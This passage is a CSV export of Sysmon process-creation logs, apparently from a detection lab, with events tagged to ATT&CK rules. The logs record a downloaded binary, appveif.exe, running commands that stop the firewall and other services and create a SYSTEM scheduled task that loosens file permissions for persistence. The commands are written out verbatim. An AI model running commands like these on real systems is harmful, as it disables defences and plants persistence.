MpsSvc""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:15.171719400Z"",""eventRecordID"":""970"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:15.143\r\nProcessGuid: {df9fc3d3-d153-5ec7-0000-0010be1d1900}\r\nProcessId: 1312\r\nImage: C:\\Windows\\SysWOW64\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: net stop MpsSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=2D09708A2B7FD7391E50A1A8E4915BD7,SHA256=A0D28F866A78EE1BFE0CF40A9713078856F9F39258AD34E5D6E6D9227BEB1F56,IMPHASH=AC592B83B5CAEB41A6F6DF7DB53F9076\r\nParentProcessGuid: {df9fc3d3-d150-5ec7-0000-0010ffa31800}\r\nParentProcessId: 5872\r\nParentImage: C:\\Windows\\SysWOW64\\cmd.exe\r\nParentCommandLine: cmd /c net stop MpsSvc\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:15.143"",""processGuid"":""{df9fc3d3-d153-5ec7-0000-0010be1d1900}"",""processId"":""1312"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""net stop MpsSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=2D09708A2B7FD7391E50A1A8E4915BD7,SHA256=A0D28F866A78EE1BFE0CF40A9713078856F9F39258AD34E5D6E6D9227BEB1F56,IMPHASH=AC592B83B5CAEB41A6F6DF7DB53F9076"",""parentProcessGuid"":""{df9fc3d3-d150-5ec7-0000-0010ffa31800}"",""parentProcessId"":""5872"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\cmd.exe"",""parentCommandLine"":""cmd /c net stop MpsSvc""}}}" +"May 22, 2020 @ 15:27:59.140",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:15.099 +ProcessGuid: {df9fc3d3-d153-5ec7-0000-0010e81c1900} +ProcessId: 2784 +Image: C:\Windows\SysWOW64\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop LanmanServer +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=DACD2D80B3942C3064B29BC0D0382EF3,SHA256=912FC9A2D5B52831C9C70643DEAB9726EC25C06E01AADE69FE844F4BA653AC7A,IMPHASH=F44A3CB56AC156111E03B2437FC54F18 +ParentProcessGuid: {df9fc3d3-d152-5ec7-0000-00108a111900} +ParentProcessId: 6960 +ParentImage: C:\Windows\SysWOW64\net.exe +ParentCommandLine: net stop LanmanServer""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:15.104475100Z"",""eventRecordID"":""968"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:15.099\r\nProcessGuid: {df9fc3d3-d153-5ec7-0000-0010e81c1900}\r\nProcessId: 2784\r\nImage: C:\\Windows\\SysWOW64\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop LanmanServer\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=DACD2D80B3942C3064B29BC0D0382EF3,SHA256=912FC9A2D5B52831C9C70643DEAB9726EC25C06E01AADE69FE844F4BA653AC7A,IMPHASH=F44A3CB56AC156111E03B2437FC54F18\r\nParentProcessGuid: {df9fc3d3-d152-5ec7-0000-00108a111900}\r\nParentProcessId: 6960\r\nParentImage: C:\\Windows\\SysWOW64\\net.exe\r\nParentCommandLine: net stop LanmanServer\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:15.099"",""processGuid"":""{df9fc3d3-d153-5ec7-0000-0010e81c1900}"",""processId"":""2784"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop LanmanServer"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=DACD2D80B3942C3064B29BC0D0382EF3,SHA256=912FC9A2D5B52831C9C70643DEAB9726EC25C06E01AADE69FE844F4BA653AC7A,IMPHASH=F44A3CB56AC156111E03B2437FC54F18"",""parentProcessGuid"":""{df9fc3d3-d152-5ec7-0000-00108a111900}"",""parentProcessId"":""6960"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\net.exe"",""parentCommandLine"":""net stop LanmanServer""}}}" +"May 22, 2020 @ 15:27:59.125",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:15.030 +ProcessGuid: {df9fc3d3-d153-5ec7-0000-0010181a1900} +ProcessId: 2232 +Image: C:\Windows\SysWOW64\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop SharedAccess +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=DACD2D80B3942C3064B29BC0D0382EF3,SHA256=912FC9A2D5B52831C9C70643DEAB9726EC25C06E01AADE69FE844F4BA653AC7A,IMPHASH=F44A3CB56AC156111E03B2437FC54F18 +ParentProcessGuid: {df9fc3d3-d152-5ec7-0000-0010ba0e1900} +ParentProcessId: 1352 +ParentImage: C:\Windows\SysWOW64\net.exe +ParentCommandLine: net stop SharedAccess""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:15.088720600Z"",""eventRecordID"":""967"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:15.030\r\nProcessGuid: {df9fc3d3-d153-5ec7-0000-0010181a1900}\r\nProcessId: 2232\r\nImage: C:\\Windows\\SysWOW64\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop SharedAccess\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=DACD2D80B3942C3064B29BC0D0382EF3,SHA256=912FC9A2D5B52831C9C70643DEAB9726EC25C06E01AADE69FE844F4BA653AC7A,IMPHASH=F44A3CB56AC156111E03B2437FC54F18\r\nParentProcessGuid: {df9fc3d3-d152-5ec7-0000-0010ba0e1900}\r\nParentProcessId: 1352\r\nParentImage: C:\\Windows\\SysWOW64\\net.exe\r\nParentCommandLine: net stop SharedAccess\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:15.030"",""processGuid"":""{df9fc3d3-d153-5ec7-0000-0010181a1900}"",""processId"":""2232"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop SharedAccess"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=DACD2D80B3942C3064B29BC0D0382EF3,SHA256=912FC9A2D5B52831C9C70643DEAB9726EC25C06E01AADE69FE844F4BA653AC7A,IMPHASH=F44A3CB56AC156111E03B2437FC54F18"",""parentProcessGuid"":""{df9fc3d3-d152-5ec7-0000-0010ba0e1900}"",""parentProcessId"":""1352"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\net.exe"",""parentCommandLine"":""net stop SharedAccess""}}}" +"May 22, 2020 @ 15:27:59.077",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:14.789 +ProcessGuid: {df9fc3d3-d152-5ec7-0000-00108a111900} +ProcessId: 6960 +Image: C:\Windows\SysWOW64\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: net stop LanmanServer +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=2D09708A2B7FD7391E50A1A8E4915BD7,SHA256=A0D28F866A78EE1BFE0CF40A9713078856F9F39258AD34E5D6E6D9227BEB1F56,IMPHASH=AC592B83B5CAEB41A6F6DF7DB53F9076 +ParentProcessGuid: {df9fc3d3-d150-5ec7-0000-00106ba41800} +ParentProcessId: 2012 +ParentImage: C:\Windows\SysWOW64\cmd.exe +ParentCommandLine: cmd /c net stop LanmanServer""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:14.792400500Z"",""eventRecordID"":""964"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:14.789\r\nProcessGuid: {df9fc3d3-d152-5ec7-0000-00108a111900}\r\nProcessId: 6960\r\nImage: C:\\Windows\\SysWOW64\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: net stop LanmanServer\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=2D09708A2B7FD7391E50A1A8E4915BD7,SHA256=A0D28F866A78EE1BFE0CF40A9713078856F9F39258AD34E5D6E6D9227BEB1F56,IMPHASH=AC592B83B5CAEB41A6F6DF7DB53F9076\r\nParentProcessGuid: {df9fc3d3-d150-5ec7-0000-00106ba41800}\r\nParentProcessId: 2012\r\nParentImage: C:\\Windows\\SysWOW64\\cmd.exe\r\nParentCommandLine: cmd /c net stop LanmanServer\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:14.789"",""processGuid"":""{df9fc3d3-d152-5ec7-0000-00108a111900}"",""processId"":""6960"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""net stop LanmanServer"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=2D09708A2B7FD7391E50A1A8E4915BD7,SHA256=A0D28F866A78EE1BFE0CF40A9713078856F9F39258AD34E5D6E6D9227BEB1F56,IMPHASH=AC592B83B5CAEB41A6F6DF7DB53F9076"",""parentProcessGuid"":""{df9fc3d3-d150-5ec7-0000-00106ba41800}"",""parentProcessId"":""2012"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\cmd.exe"",""parentCommandLine"":""cmd /c net stop LanmanServer""}}}" +"May 22, 2020 @ 15:27:59.046",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:14.733 +ProcessGuid: {df9fc3d3-d152-5ec7-0000-0010ba0e1900} +ProcessId: 1352 +Image: C:\Windows\SysWOW64\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: net stop SharedAccess +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=2D09708A2B7FD7391E50A1A8E4915BD7,SHA256=A0D28F866A78EE1BFE0CF40A9713078856F9F39258AD34E5D6E6D9227BEB1F56,IMPHASH=AC592B83B5CAEB41A6F6DF7DB53F9076 +ParentProcessGuid: {df9fc3d3-d150-5ec7-0000-00100f9b1800} +ParentProcessId: 6504 +ParentImage: C:\Windows\SysWOW64\cmd.exe +ParentCommandLine: cmd /c net stop SharedAccess""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:14.753959700Z"",""eventRecordID"":""962"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:14.733\r\nProcessGuid: {df9fc3d3-d152-5ec7-0000-0010ba0e1900}\r\nProcessId: 1352\r\nImage: C:\\Windows\\SysWOW64\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: net stop SharedAccess\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=2D09708A2B7FD7391E50A1A8E4915BD7,SHA256=A0D28F866A78EE1BFE0CF40A9713078856F9F39258AD34E5D6E6D9227BEB1F56,IMPHASH=AC592B83B5CAEB41A6F6DF7DB53F9076\r\nParentProcessGuid: {df9fc3d3-d150-5ec7-0000-00100f9b1800}\r\nParentProcessId: 6504\r\nParentImage: C:\\Windows\\SysWOW64\\cmd.exe\r\nParentCommandLine: cmd /c net stop SharedAccess\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:14.733"",""processGuid"":""{df9fc3d3-d152-5ec7-0000-0010ba0e1900}"",""processId"":""1352"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""net stop SharedAccess"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=2D09708A2B7FD7391E50A1A8E4915BD7,SHA256=A0D28F866A78EE1BFE0CF40A9713078856F9F39258AD34E5D6E6D9227BEB1F56,IMPHASH=AC592B83B5CAEB41A6F6DF7DB53F9076"",""parentProcessGuid"":""{df9fc3d3-d150-5ec7-0000-00100f9b1800}"",""parentProcessId"":""6504"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\cmd.exe"",""parentCommandLine"":""cmd /c net stop SharedAccess""}}}" +"May 22, 2020 @ 15:27:59.031",10,"ATT&CK: Suspicious Process Creation","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:14.723 +ProcessGuid: {df9fc3d3-d152-5ec7-0000-0010380e1900} +ProcessId: 1388 +Image: C:\Windows\SysWOW64\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: schtasks /create /sc minute /mo 1 /tn ""Flash"" /ru system /tr ""cmd /c echo Y|cacls C:\Users\JOHNWI~1\AppData\Local\Temp\Networks\taskmgr.exe /p everyone:F"" +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A6A56567B9859A0D147C898CECB9AAAE,SHA256=97CA3FAD547C4E0FE797DB77C414213BA981BC4C39C05AA3E9E42C2A5D494139,IMPHASH=F177D457505ECC524AD2D63680709AF4 +ParentProcessGuid: {df9fc3d3-d150-5ec7-0000-001077981800} +ParentProcessId: 6516 +ParentImage: C:\Windows\SysWOW64\cmd.exe +ParentCommandLine: cmd /c schtasks /create /sc minute /mo 1 /tn ""Flash"" /ru system /tr ""cmd /c echo Y|cacls C:\Users\JOHNWI~1\AppData\Local\Temp\Networks\taskmgr.exe /p everyone:F""""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:14.752193300Z"",""eventRecordID"":""961"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:14.723\r\nProcessGuid: {df9fc3d3-d152-5ec7-0000-0010380e1900}\r\nProcessId: 1388\r\nImage: C:\\Windows\\SysWOW64\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: schtasks /create /sc minute /mo 1 /tn \""Flash\"" /ru system /tr \""cmd /c echo Y|cacls C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Networks\\taskmgr.exe /p everyone:F\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A6A56567B9859A0D147C898CECB9AAAE,SHA256=97CA3FAD547C4E0FE797DB77C414213BA981BC4C39C05AA3E9E42C2A5D494139,IMPHASH=F177D457505ECC524AD2D63680709AF4\r\nParentProcessGuid: {df9fc3d3-d150-5ec7-0000-001077981800}\r\nParentProcessId: 6516\r\nParentImage: C:\\Windows\\SysWOW64\\cmd.exe\r\nParentCommandLine: cmd /c schtasks /create /sc minute /mo 1 /tn \""Flash\"" /ru system /tr \""cmd /c echo Y|cacls C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Networks\\taskmgr.exe /p everyone:F\""\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:14.723"",""processGuid"":""{df9fc3d3-d152-5ec7-0000-0010380e1900}"",""processId"":""1388"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""schtasks /create /sc minute /mo 1 /tn \\\""Flash\\\"" /ru system /tr \\\""cmd /c echo Y|cacls C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Networks\\\\taskmgr.exe /p everyone:F\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A6A56567B9859A0D147C898CECB9AAAE,SHA256=97CA3FAD547C4E0FE797DB77C414213BA981BC4C39C05AA3E9E42C2A5D494139,IMPHASH=F177D457505ECC524AD2D63680709AF4"",""parentProcessGuid"":""{df9fc3d3-d150-5ec7-0000-001077981800}"",""parentProcessId"":""6516"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\cmd.exe"",""parentCommandLine"":""cmd /c schtasks /create /sc minute /mo 1 /tn \\\""Flash\\\"" /ru system /tr \\\""cmd /c echo Y|cacls C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Networks\\\\taskmgr.exe /p everyone:F\\\""""}}}" +"May 22, 2020 @ 15:27:57.188",10,"ATT&CK: Suspicious Process Creation","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:12.800 +ProcessGuid: {df9fc3d3-d150-5ec7-0000-001077981800} +ProcessId: 6516 +Image: C:\Windows\SysWOW64\cmd.exe +FileVersion: 10.0.18362.449 (WinBuild.160101.0800) +Description: Windows Command Processor +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: Cmd.Exe +CommandLine: cmd /c schtasks /create /sc minute /mo 1 /tn ""Flash"" /ru system /tr ""cmd /c echo Y|cacls C:\Users\JOHNWI~1\AppData\Local\Temp\Networks\taskmgr.exe /p everyone:F"" +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E72506477317969211638830DE3174D8,SHA256=4B2F2B322507F4E59204E8750DBDF4761825F546F617571E76461768F795FB55,IMPHASH=392B4D61B1D1DADC1F06444DF258188A +ParentProcessGuid: {df9fc3d3-d12b-5ec7-0000-001085131400} +ParentProcessId: 6980 +ParentImage: C:\Users\John Williams\Downloads\appveif.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\appveif.exe"" ""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:12.802331200Z"",""eventRecordID"":""952"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:12.800\r\nProcessGuid: {df9fc3d3-d150-5ec7-0000-001077981800}\r\nProcessId: 6516\r\nImage: C:\\Windows\\SysWOW64\\cmd.exe\r\nFileVersion: 10.0.18362.449 (WinBuild.160101.0800)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: cmd /c schtasks /create /sc minute /mo 1 /tn \""Flash\"" /ru system /tr \""cmd /c echo Y|cacls C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Networks\\taskmgr.exe /p everyone:F\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E72506477317969211638830DE3174D8,SHA256=4B2F2B322507F4E59204E8750DBDF4761825F546F617571E76461768F795FB55,IMPHASH=392B4D61B1D1DADC1F06444DF258188A\r\nParentProcessGuid: {df9fc3d3-d12b-5ec7-0000-001085131400}\r\nParentProcessId: 6980\r\nParentImage: C:\\Users\\John Williams\\Downloads\\appveif.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\appveif.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:12.800"",""processGuid"":""{df9fc3d3-d150-5ec7-0000-001077981800}"",""processId"":""6516"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\cmd.exe"",""fileVersion"":""10.0.18362.449 (WinBuild.160101.0800)"",""description"":""Windows Command Processor"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""Cmd.Exe"",""commandLine"":""cmd /c schtasks /create /sc minute /mo 1 /tn \\\""Flash\\\"" /ru system /tr \\\""cmd /c echo Y|cacls C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Networks\\\\taskmgr.exe /p everyone:F\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E72506477317969211638830DE3174D8,SHA256=4B2F2B322507F4E59204E8750DBDF4761825F546F617571E76461768F795FB55,IMPHASH=392B4D61B1D1DADC1F06444DF258188A"",""parentProcessGuid"":""{df9fc3d3-d12b-5ec7-0000-001085131400}"",""parentProcessId"":""6980"",""parentImage"":""C:\\\\Users\\\\John 